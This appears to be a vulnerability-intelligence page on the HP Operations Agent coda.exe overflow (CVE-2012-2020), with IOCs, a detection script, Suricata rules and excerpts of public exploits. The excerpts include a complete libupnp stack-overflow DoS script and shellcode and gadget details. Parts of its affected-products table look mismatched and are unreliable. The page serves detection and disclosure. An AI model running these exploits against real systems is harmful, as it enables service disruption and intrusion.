CVE-2012-2020
Published 2012-07-11
CVE-2012-2020: Unspecified vulnerability in HP Operations Agent before 11.03.12 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1326.
Priority: P2 (75) · Severity: critical · CVSS 2.0 base score: 10 · Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: available · EPSS: 64.69% (99.1st percentile)
Affected
30 ranges, showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | operations_agent | <= 11.0 | — |
| hp | operations_agent | — | — |
| msrc | windows_10 | — | — |
| msrc | windows_10_version_1607 | — | — |
| msrc | windows_10_version_1709 | — | — |
| msrc | windows_10_version_1803 | — | — |
| msrc | windows_10_version_1809 | — | — |
| msrc | windows_10_version_1903 | — | — |
| msrc | windows_10_version_1909 | — | — |
| msrc | windows_10_version_2004 | — | — |
| msrc | windows_7 | — | — |
| msrc | windows_8.1 | — | — |
| msrc | windows_rt_8.1 | — | — |
| msrc | windows_server_2008 | — | — |
Detection & IOCs (extracted from sources)
- other: 0x10073c2c (stack pivot ADD ESP,404 RETN from OvSecCore.dll, HP Operations Agent 11.00 / Windows 2003 SP2)
- bytes: \x81\xc4\x54\xf2\xff\xff
- Detect exploitation attempts by monitoring for HTTP requests to coda.exe containing opcode 0x8c with oversized payloads (>2084 bytes) on the random TCP port used by the service.
- Check the HTTP response banner for 'server:.*coda 11.' to fingerprint vulnerable HP Operations Agent instances during reconnaissance; a minor version below the target threshold indicates a vulnerable host.
- Monitor for the stack-adjustment prepend encoder byte sequence \x81\xc4\x54\xf2\xff\xff (ADD ESP, -3500) in TCP payloads, which is prepended to shellcode in exploit attempts.
- The exploit uses chunked HTTP encoding to deliver the overflow buffer; monitor for chunked HTTP POST bodies to coda.exe's port containing SEH record overwrites and large random-text padding (~4000 bytes).
- coda.exe runs on a random TCP port; use the Metasploit check/ping function pattern (HTTP/1.1 200 OK + coda server banner) to identify exposed instances that have been granted network access beyond localhost.
- coda.exe is only remotely exploitable if network access has been explicitly granted in its configuration; by default it only listens on localhost, significantly limiting the remote attack surface.
- coda.exe binds to a random TCP port on each start, making static port-based firewall rules or detection signatures insufficient without dynamic port discovery.
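A defender-side check that implements the banner fingerprint and the two payload indicators listed above, added here as example code (it is not taken from the Metasploit module or any other source linked on this page); the dotted version layout after "coda " in the banner and the function names are assumptions.

```python
import re

# Fixed version from the advisory text at the top of this page:
# HP Operations Agent before 11.03.12 is affected.
FIXED_VERSION = (11, 3, 12)

# Stack-adjust prefix quoted in the IOC list (ADD ESP, -3500).
STACK_ADJUST = b"\x81\xc4\x54\xf2\xff\xff"

# Oversized-body threshold for 0x8c requests quoted in the IOC list.
OVERSIZE_THRESHOLD = 2084

# Assumption: the coda banner carries a dotted version after "coda "
# (e.g. "Server: coda 11.00.044"). The IOC list only gives the
# 'server:.*coda 11.' pattern, so the version layout is assumed here.
_BANNER_RE = re.compile(
    rb"^server:\s*coda\s+(\d+)\.(\d+)(?:\.(\d+))?", re.IGNORECASE | re.MULTILINE
)


def coda_version(response: bytes):
    """Return (major, minor, patch) from a coda 'server:' header, or None if absent."""
    m = _BANNER_RE.search(response)
    if m is None:
        return None
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable_banner(response: bytes) -> bool:
    """True when the banner identifies a coda build older than the fixed version."""
    version = coda_version(response)
    return version is not None and version < FIXED_VERSION


def payload_indicators(body: bytes) -> list:
    """Names of the IOC-list indicators present in one request body sent to the coda port."""
    hits = []
    if STACK_ADJUST in body:
        hits.append("stack_adjust_prefix")
    if len(body) > OVERSIZE_THRESHOLD:
        hits.append("oversized_body")
    return hits


if __name__ == "__main__":
    # Constructed sample data, not captured traffic.
    banner = b"HTTP/1.1 200 OK\r\nServer: coda 11.00.044\r\nContent-Length: 0\r\n\r\n"
    print(coda_version(banner), is_vulnerable_banner(banner))
    print(payload_indicators(b"A" * 3000 + STACK_ADJUST))
```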
CVSS provenance
- nvd: CVSS v2.0, 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
- vendor_msrc: 7.8 HIGH
Suricata · 2012-09-28 · CVE-2007-1036
ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/invoker/JMXInvokerServlet/"; nocase; reference:cve,2007-1036; reference:url,exploit-db.com/exploits/21080/; classtype:web-application-attack; sid:2015747; rev:4; metadata:created_at 2012_09_28, cve CVE_2007_1036, confidence Medium, signature_severity Major, updated_at 2020_04_22;)
Suricata · 2012-09-22 · CVE-2012-3574
ET EXPLOIT Access To mm-forms-community upload dir (Inbound)
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Access To mm-forms-community upload dir (Inbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/wp-content/plugins/mm-forms-community/upload/temp/"; fast_pattern; reference:url,www.exploit-db.com/exploits/18997/; reference:cve,2012-3574; classtype:trojan-activity; sid:2015727; rev:4; metadata:created_at 2012_09_22, cve CVE_2012_3574, signature_severity Major, updated_at 2020_09_01;)
Suricata · 2012-09-22 · CVE-2012-3574
ET EXPLOIT Access To mm-forms-community upload dir (Outbound)
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Access To mm-forms-community upload dir (Outbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/wp-content/plugins/mm-forms-community/upload/temp/"; fast_pattern; reference:url,www.exploit-db.com/exploits/18997/; reference:cve,2012-3574; classtype:trojan-activity; sid:2015726; rev:4; metadata:created_at 2012_09_22, cve CVE_2012_3574, signature_severity Major, updated_at 2020_09_01;)
Exploit-DB · 2020-11-27 · CVE-2012-5958 [CRITICAL] · CVSS 10.0
libupnp 1.6.18 - Stack-based buffer overflow (DoS)
---
# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
# Date: 2020-08-20
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://pupnp.sourceforge.io/
# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
# Version: <= 1.6.6
# Tested on: Linux
# CVE : CVE-2012-5958
import socket
payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
payload += "A"*324 + "BBBB"
payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"
byte_message = bytes(payload)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(byte_message, ("239.255.255.250", 1900))
Exploit-DB · 2020-03-02 · CVE-2020-8012 [CRITICAL] · CVSS 9.8
CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow
---
# Exploit Title: CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow
# Exploit Author: wetw0rk
# Exploit Version: Public POC
# Vendor Homepage: https://docops.ca.com/ca-unified-infrastructure-management/9-0-2/en
# Software Version : 7.80
# Tested on: Windows 10 Pro (x64), Windows Server 2012 R2 Standard (x64)
# CVE: CVE-2020-8012
/**************************************************************************************************************************
* Description:
* Unauthenticated Nimbus nimcontroller RCE, tested against build 7.80.3132 although multiple versions are affected.
* The exploit won't crash the service.
* You may have to run the exploit code multiple tim
Exploit-DB · 2020-01-29 · CVE-2018-8413 [HIGH] · CVSS 8.1
Microsoft Windows 10 - Theme API 'ThemePack' File Parsing
---
# Exploit Title: Microsoft Windows 10 - Theme API 'ThemePack' File Parsing
# Google Dork: n/a
# Date: 2020-10-28
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://www.microsoft.com/
# Software Link: http://www.microsoft.com/
# Version: 10 v.1803 (17134.407)
# Tested on: Windows 7, 8.0, 8.1, 10, Server 2012, Server 2012 R2, Server 2016, Server 2019
# CVE : CVE-2018-8413
# Discovered by: Eduardo Braun Prado
[Details]
Microsoft 'themepack' files are classic '.theme' files compressed for sharing over the internet. Theme files allow users to customize visual aspects of their device, such as icons for known features like 'My computer' and 'trash bin' folders, the default screensaver (which by the way allowed attacke
Exploit-DB · 2012-10-29 · CVE-2012-2020
HP Operations Agent - Opcode 'coda.exe' 0x8c Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in HP Operations Agent for
Windows. The vulnerability exists in the HP Software Performance Core Program
component (coda.exe) when parsing requests for the 0x8c opcode. This module has
been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and
Windows 2003 SP2 (DEP bypass).
The coda.exe com
Metasploit
HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow
This module exploits a buffer overflow vulnerability in HP Operations Agent for Windows. The vulnerability exists in the HP Software Performance Core Program component (coda.exe) when parsing requests for the 0x8c opcode. This module has been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass). The coda.exe component runs only for localhost by default; network access must be granted through its configuration to be remotely exploitable. On the other hand it runs on a random TCP port, so to make reconnaissance easier a check function is provided.
Nuclei · CVE-2021-38154 [HIGH] · CVSS 7.5
Canon Devices - Authentication Bypass in Catwalk Server
Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.
Template:
id: CVE-2021-38154
info:
  name: Canon Devices - Authentication Bypass in Catwalk Server
  author: daffainfo
  severity: high
  description: |
    Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is